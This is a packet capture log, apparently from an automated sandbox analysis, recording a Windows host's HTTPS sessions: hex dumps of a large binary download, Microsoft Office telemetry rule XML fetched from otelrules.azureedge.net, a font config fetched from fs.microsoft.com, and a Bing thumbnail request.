2024-11-23 06:09:29 UTC	16384	IN	Data Raw: bc b8 e2 0a 0e 39 ea 3f 5a c8 87 50 67 d6 24 91 ef 66 6f 30 b7 23 9e 33 d0 0f 40 33 56 af b4 db 9b af 12 5b dc 19 21 cb 0c 2a 97 ea b8 e7 f5 a9 34 bd 05 6d e4 69 2e a7 87 cc 66 6d a1 64 c0 51 f5 35 e1 46 50 51 d5 eb 63 d7 f7 9b d8 8a 3b 95 bd be 86 39 6e 6f 64 40 b8 5c be dc 73 db 1d eb 4e 13 68 f1 a8 68 1a ed f7 13 b9 89 62 d8 f7 ed 55 ed e3 b2 86 f6 15 37 01 4a a7 01 65 dd 9c fa f1 5b 3a 30 b6 b7 b7 92 48 1e 35 5c b3 11 83 c8 03 93 cf 35 85 49 25 d0 a4 99 81 6b 68 f2 69 71 8b 6b 18 62 f3 24 ce e9 72 40 19 24 e3 d6 a9 da db 4e fa cc 6d 3c cd e5 f9 c4 ec 84 6d dd 81 db 3d 2b a1 69 ed 7f b3 6d 1c 4b b4 36 e6 00 f3 c1 aa 26 f3 4c 96 38 d9 50 92 b3 b2 9c 2e 1b 01 7b 55 c6 a4 b5 d0 9e 54 4b 21 8a da fd a6 84 2a ac 98 ca c9 26 e6 3e a4 f4 cd 4b 75 b1 f6 cf 25 Data Ascii: 9?ZPg$fo0#3@3V[!4mi.fmdQ5FPQc;9nod@\sNhhbU7Je[:0H5\5I%khiqkb$r@$Nm<m=+imK6&L8P.{UTK!&>Ku%
2024-11-23 06:09:29 UTC	16384	IN	Data Raw: 00 fc ae ce 72 cc c3 9c 2e 70 7f 03 5d fe a9 e2 1d 55 b5 98 65 d3 8b 2f 87 a5 d2 4c 36 da 3c 1b 56 49 65 42 4b 5c 4a e3 03 73 60 00 a3 ad 79 f8 ca bc ca 2a 9a 5e 57 fe b7 df 7d 0e cc 35 37 16 dc 9b f3 fe bb 1c a0 8e c6 de e2 7f 0f db 5b fd 92 e2 1b 63 24 0b 2c 9b d6 18 d5 8f ce fb 79 e4 72 3e a2 a3 f0 65 8a dd 78 e9 00 b4 6b 8b 40 be 64 b2 08 c9 49 48 19 de 0f 55 e7 1c 1a 82 6d 17 4e b9 f8 8d a6 ea 57 71 9b 7b ef ec eb 8b dd 61 ad e6 75 8d e3 49 14 08 58 8e 46 57 23 3c 74 ad 2f 09 78 92 ff 00 cb d4 2f de c2 35 92 6b 82 ba 67 96 ac 88 b0 9c ed 72 0f 1b 41 3c b1 fb d8 e9 cd 44 f9 b9 1f 26 b7 5a fa ed fa 5c da 3c bc cb 9b 4b 32 d5 e6 a6 8d 7c 6c ec ed 8c 9a 63 48 b1 34 9e 62 90 ec 73 b9 4e 3a 60 63 3f 53 e9 5c 8d 8d 8f 85 75 8b 4d 59 75 7d 11 ee 6c ed ec b6 Data Ascii: r.p]Ue/L6<VIeBK\Js`y*^W}57[c$,yr>exk@dIHUmNWq{auIXFW#<t/x/5kgrA<D&Z\<K2\|lcH4bsN:`c?S\uMYu}l
2024-11-23 06:09:30 UTC	16384	IN	Data Raw: e5 0a 1b 24 93 f2 8f 7f a5 77 fa 2a dd d8 78 6d 22 95 14 bc 59 9a 69 38 c3 4c 47 40 7b 84 18 15 cc 78 1b 4b bb 8b 4b f1 04 97 3e 6d 9c 9a d6 a4 27 32 01 fb c7 8d 54 2a ec ec 32 72 7f 1f 7a f2 b0 d5 7d 92 93 56 b2 b7 cc ec ad 4f 9d a5 fd 23 3e 6f 0f 5b 6b 8d 26 cd 47 33 2c 31 cb b2 28 87 de 65 05 89 3d 02 8e 3f 5a cd f1 4b f8 87 44 d3 a1 8b 48 d0 bf b4 cf 30 9b 86 03 ec f3 49 8f 99 11 8e 08 c6 47 3f 80 af 4c d0 ec 5a c2 df fb 2e d6 da 18 ec fc a5 12 47 bc 13 2b 67 3b 09 eb ea 4d 68 ea 96 51 6b ab ff 00 08 f6 a6 51 ed 3e ca 59 a6 40 14 2c 87 ee 90 7b 63 8e 9e 95 51 c7 72 cd 5d 5e 28 99 61 ef 17 67 67 fd 77 3e 3c f1 64 d6 fe 2c 9e ea 4d 66 5b ab 1b e8 58 2d a4 56 cb 23 c3 19 0b ca 39 e8 5b b0 e3 b5 70 3a a4 57 16 77 cc 25 95 a4 55 38 49 5a 33 b7 3e 87 d0 8a Data Ascii: $wxm"Yi8LG@{xKK>m'2T2rz}VO#>o[k&G3,1(e=?ZKDH0IG?LZ.G+g;MhQkQ>Y@,{cQr]^(aggw><d,Mf[X-V#9[p:Ww%U8IZ3>
2024-11-23 06:09:30 UTC	16384	IN	Data Raw: b0 bc 2a ab d3 7f 7a 7d d1 c9 57 0a db 4e 0f de fc fd 4f 97 21 d5 59 f4 f6 49 e3 dd 35 ab 80 1c 81 f2 ae 4e 39 f4 23 06 9d 6f 30 6d b2 cc 3e 65 1b 8a 81 f7 89 3d fd 2b dc bc 3b f0 0b c2 9a 4c b1 2d 8d de ad 1c 30 b9 db 14 b3 89 d3 18 e0 02 e3 20 0e 31 56 a6 f8 15 a4 be a4 d7 53 6a d3 38 38 c0 09 8c 9f f6 bb 7e 55 de f3 4c 2b 7e ed ed e8 4f b1 a8 ad 76 ae 7c fe f7 2d 2c b2 c6 aa 50 67 d7 b7 bd 4f a6 24 51 4c f2 89 d1 be 53 f2 82 7b f1 8a f7 89 7e 04 da 45 20 b8 b0 d5 b6 b3 36 4a 4d 11 20 f3 eb d7 1e dd 2b 17 c5 5f 0c b5 9d 12 cd 9f 42 f0 96 9f ad cc 47 cb be 76 1c f7 56 19 04 12 33 82 38 ce 29 ff 00 68 d1 96 8b fc bf 30 f6 6f 7b 9e 45 67 10 92 e7 7c 50 f2 df 7b 2d d0 7f 8d 49 a8 6a 50 59 69 b2 de 4f 02 ac 71 72 cc 48 dd 81 d8 7a 93 5e a1 a0 fc 2a f1 1e ad Data Ascii: z}WNO!YI5N9#o0m>e=+;L-0 1VSj88~UL+~Ov\|-,PgO$QLS{~E 6JM +_BGvV38)h0o{Eg\|P{-IjPYiOqrHz^
2024-11-23 06:09:30 UTC	16384	IN	Data Raw: 8f 4c d3 e1 5c f2 47 eb 5f a2 28 28 9f 9c b9 b9 16 23 94 0a 3c ce f5 0a a0 ea 4f 14 8c 40 6d a0 53 b2 0b 93 99 18 ae 33 c5 37 6b 37 43 51 6e 6c e0 0f d6 a5 86 40 8b f3 0e 68 d8 37 2e e9 6d e5 75 5e 4f b5 5a 92 60 5c 2e 7e b5 9b f6 af 4a 64 b7 44 b6 41 ac 9c 1b 66 aa 69 2b 1a a2 54 1d 5b f0 a6 49 76 b9 c2 9c 56 43 dc 93 d4 fe b4 c6 9c fa fe b4 d5 21 7b 53 4e e2 e8 15 c1 35 4a 69 fa e4 e3 f1 aa 92 4f 55 e4 9f d7 9a d6 34 cc 65 56 e5 df b4 00 72 0e 2a 41 76 0a f2 73 59 32 4b ef cf d6 96 16 66 6e bc 75 cd 69 ec cc d5 43 42 6b 8c f2 07 35 13 4a cd f2 a8 e6 a1 dd f3 60 1f c6 a6 57 08 00 1c fa 9a 56 b0 ef 71 92 07 03 9a 8f 0c 7a d4 d2 48 a6 a0 56 26 4c 0e 01 aa 44 bb 0d 6f 42 29 73 ef 4f 98 81 f2 aa 8c 9e f4 e8 ed 46 d5 2c c7 de 9f 32 44 f2 b6 c2 15 92 46 01 17 Data Ascii: L\G_((#<O@mS37k7CQnl@h7.mu^OZ`\.~JdDAfi+T[IvVC!{SN5JiOU4eVr*AvsY2KfnuiCBk5J`WVqzHV&LDoB)sOF,2DF
2024-11-23 06:09:30 UTC	16384	IN	Data Raw: 0d 6c df 69 0a 7c c2 a0 63 68 ce 06 7d ab 3b fd 02 7d 63 49 8d 61 91 43 4b 29 7c bf 1f 20 e3 3e d9 a9 4a 4b 72 1b bb 3a 05 31 c3 0a a3 cf 0c 5c 66 49 1b 80 83 d4 fe b5 e1 fe 29 d4 67 ba f1 d6 a2 f7 17 16 82 14 94 c5 6c ca 49 de 00 3b 70 3b 02 7a 7d 6b d5 bc 49 ab 69 b6 de 1d bf 9d dd 61 59 81 85 19 a3 04 72 30 3a fb 0f d6 be 7a 9e 68 ee 9b 52 d5 a4 76 92 56 bd 88 44 c5 3e 46 65 50 8f 10 1d 97 69 c8 3e a0 d7 a5 94 d2 e6 73 a8 fd 0e 3c 5c dc 79 62 8e a7 c0 b0 5c 2d 9e b5 e1 4b 36 b7 95 f4 b9 8e a3 a3 b3 13 f3 a3 c7 e6 aa 03 dc 6e 0e bf 8f b5 57 f0 5d c6 9d a8 d8 b5 fd ac ab 22 dc 6a 32 4c 70 18 3c 1e 72 82 d1 fb 6d 70 d9 06 ae 47 75 69 69 aa 3e bc a6 49 4e 8b 66 f6 77 96 6b 18 56 9a 28 e4 1b 8a 9e ce 15 f2 3d 41 f7 ac 5d 3d 6c 74 9f 8c cf a4 69 b7 72 36 99 Data Ascii: li\|ch};}cIaCK)\| >JKr:1\fI)glI;p;z}kIiaYr0:zhRvVD>FePi>s<\yb\-K6nW]"j2Lp<rmpGuii>INfwkV(=A]=ltir6
2024-11-23 06:09:30 UTC	16069	IN	Data Raw: f3 bf a9 cf e9 37 72 df f8 f9 a3 2d 1a c6 cc 66 de 70 06 d5 e4 73 f9 57 45 ab 6a 7f 67 be 8a c6 22 bf 6c d4 24 0c c3 a6 22 ec 3f 99 ac df 85 3e 16 bd d5 b5 09 35 05 b6 57 8a cd 1a 29 31 28 01 c9 60 78 cf d3 f0 fc 6a 9c 7a 3e a1 77 f1 8b ec b2 c4 ff 00 68 12 f9 91 6e 94 37 ca 06 08 cf 4c 0e 3e 95 15 15 39 d4 6a ff 00 0a 2a 15 25 08 2d 3e 26 73 fe 20 95 ad be 35 2e 9e 42 ac 77 92 45 24 6d bb a4 81 5b bf b8 c8 c7 d2 ba 1f 0b a4 aa d7 37 72 18 de 3b 4b e9 1b 96 f9 95 52 25 03 3e dc 9c 7d 4d 67 7c 6a f0 ce a3 67 e2 a8 35 01 06 d9 2d d5 6e a1 60 e1 ce d8 cf ce bc 7b 73 f4 cf a5 74 96 3a 1d ca 7c 2f d4 b5 e8 62 f2 d6 f6 d8 ce cd e6 af ca ae 00 5c fa e0 63 35 bd 4a b0 74 29 b4 f7 49 18 d3 ba ad 51 76 6d 99 be 15 bd 97 53 59 2e de 0b 71 14 da 95 b4 93 6e 01 76 c7 Data Ascii: 7r-fpsWEjg"l$"?>5W)1(`xjz>whn7L>9j*%->&s 5.BwE$m[7r;KR%>}Mg\|jg5-n`{st:\|/b\c5Jt)IQvmSY.qnv
2024-11-23 06:09:30 UTC	16384	IN	Data Raw: f3 18 06 1f 28 c7 00 fb ff 00 8d 7c 9e 69 9a 3a ef d9 51 f8 7f 3f f8 07 b5 83 c2 38 2e 79 ad 7f 23 9e d4 af 27 fe d6 9e 5b 8b 45 f3 21 72 48 52 76 ed c0 db 91 df 26 ab 6a da bc ab 15 bc 30 58 b3 8b 87 6c 36 d2 81 89 c9 24 7f 4a 55 d5 a5 6b 6b 87 0a aa fa 95 d2 db 2c 8c 37 7c 98 dd 33 e3 d1 54 81 f5 c5 6a cb e2 eb 3b 99 04 52 69 8b 2d 8c 2d b6 3c 21 cb 15 fb aa 47 60 38 cd 79 72 4f 4f 77 63 bd 4a c7 3d 71 0a ad bc d7 92 58 99 27 86 3c 03 1b e0 26 3f 52 40 cd 3a c8 5b 5d 78 9a 2b 19 60 67 8e 3b 71 73 2e 1b 9c 75 18 c7 f7 81 18 fa 9f 4a d2 b7 d6 45 fb 14 82 08 56 4b a5 29 2a f9 64 72 46 4f 1d 80 1c 7d 05 74 77 67 44 b7 86 3d d1 47 e6 79 48 92 4d 08 0b e6 05 18 55 f5 c0 e7 02 a9 cd c7 46 b5 1f 31 81 75 7b 69 1d c4 a3 f7 90 c9 b1 76 46 d1 92 10 1f 7e fc d7 9d Data Ascii: (\|i:Q?8.y#'[E!rHRv&j0Xl6$JUkk,7\|3Tj;Ri--<!G`8yrOOwcJ=qX'<&?R@:[]x+`g;qs.uJEVK)*drFO}twgD=GyHMUF1u{ivF~
2024-11-23 06:09:30 UTC	16384	IN	Data Raw: 79 9e 62 e3 2a 78 20 fb 1e 9f 88 ad aa fe f3 14 a2 9d d6 8f f4 32 a7 6a 74 1c 9a ee 8e 3d 6e 92 c7 5f f0 f7 89 a3 52 ab a7 de 0b 7b c6 53 85 6b 76 1b 1c 91 df 0a c8 dc fa 1a f5 0f 86 3a 71 b4 f0 ca 69 b1 40 ab f6 4d 4a 68 d8 e0 60 a0 24 e7 1d b2 08 3f 8d 70 33 be 9f fd 89 33 b6 99 33 69 b7 97 71 c3 e6 39 20 44 ec a5 10 1c 76 6d fb 4f d0 7a 57 75 f0 6e 6b f7 d3 ef 62 d9 25 f4 76 b1 47 0c 97 45 0a 31 9d 57 64 88 47 66 05 40 3f fd 7a ac cb 5a 17 ed fd 7e ac 9c 15 95 5d b7 fe bf 43 85 fd a9 bc 34 da f7 87 53 55 d3 ad 03 dd e9 0c c5 bc b5 f9 9e 1e fd 3a e3 af e7 5e 57 f0 bb c6 16 56 f6 33 78 73 c4 30 fd a3 45 bf e1 b7 60 fd 99 88 fb c3 fd 92 71 9f 43 83 5f 58 4b 72 f6 13 23 0d 28 b2 a9 e4 15 ea 3b e7 d8 f3 5f 30 fe d2 fe 0a 9b c3 7e 2e 7f 13 68 ba 34 d6 7a 1e Data Ascii: yb*x 2jt=n_R{Skv:qi@MJh`$?p333iq9 DvmOzWunkb%vGE1WdGf@?zZ~]C4SU:^WV3xs0E`qC_XKr#(;_0~.h4z

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.6	49779	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:29 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:30 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: a56dfe0e-901e-0029-2976-3b274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060930Z-174c587ffdf7t49mhC1TEB4qbg00000002gg000000004a99 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:30 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.6	49781	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:29 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:30 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 70a27cfc-201e-0051-268c-3a7340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060930Z-178bfbc474bwh9gmhC1NYCy3rs000000044000000000a2qb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:30 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.6	49782	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:29 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:30 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: babf4520-701e-005c-6e46-3cbb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060930Z-178bfbc474b9xljthC1NYCtw9400000004100000000045nk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:30 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.6	49783	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:30 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:30 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:30 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: c569ec8c-a01e-003d-0e22-3d98d7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060930Z-178bfbc474bbcwv4hC1NYCypys0000000410000000000cqh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-23 06:09:30 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.6	49780	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:30 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:30 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 798eb064-701e-0021-422e-3c3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060930Z-178bfbc474bnwsh4hC1NYC2ubs000000042000000000etu8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:30 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	49785	23.218.208.109	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:30 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-23 06:09:30 UTC	534	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=38172 Date: Sat, 23 Nov 2024 06:09:30 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-23 06:09:30 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	49787	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:30 UTC	346	OUT	GET /th?id=OADD2.10239340418545_11VT5XTZM3TEDIRSP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-23 06:09:30 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 581101 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 5C3368BEFDE447B58A34306DC417CE79 Ref B: EWR30EDGE0715 Ref C: 2024-11-23T06:09:30Z Date: Sat, 23 Nov 2024 06:09:29 GMT Connection: close
